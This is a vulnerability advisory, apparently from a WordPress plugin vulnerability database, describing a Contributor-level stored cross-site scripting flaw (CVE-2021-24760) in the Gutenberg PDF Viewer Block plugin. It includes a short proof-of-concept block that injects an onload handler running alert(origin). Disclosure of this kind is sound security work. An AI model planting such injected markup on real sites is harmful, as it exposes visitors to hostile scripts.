Gutenberg PDF Viewer Block < 1.0.1 – Contributor+ Stored Cross-Site Scripting | CVE 2021-24760 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape its block, which could allow users with a role as low as Contributor to perform Cross-Site Scripting attacks.

Proof of Concept

<!-- wp:pdf-viewer-block/standard -->
<div class="wp-block-pdf-viewer-block-standard" style="text-align:left"><div class="uploaded-pdf"><a href="https://example.com/#"onload="alert(origin)" data-width="" data-height=""></a></div></div>
<!-- /wp:pdf-viewer-block/standard -->

Affects Plugins

pdf-viewer-block

Fixed in 1.0.1

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

aebf821f-1724-4e4c-8d42-5a94e509d271

Timeline

Publicly Published

2021-09-20 (about 2 years ago)

Added

2021-09-20 (about 2 years ago)

Last Updated

2022-04-08 (about 2 years ago)

Other

Published

Title

Published

2022-08-16

Title

Affiliates Manager < 2.9.14 - Admin+ Stored Cross-Site Scripting

Published

2024-02-28

Title

My Sticky Bar < 2.6.8 - Admin+ Stored XSS

Published

2022-09-14

Title

Cryptocurrency Pricing list and Ticker <= 1.5 - Reflected Cross-Site Scripting

Published

2020-01-13

Title

Computer Repair Shop < 2.0 - Authenticated Stored XSS

Published

2024-01-24

Title

PDF Poster - PDF Embedder Plugin for WordPress < 2.1.18 - Reflected Cross-Site Scripting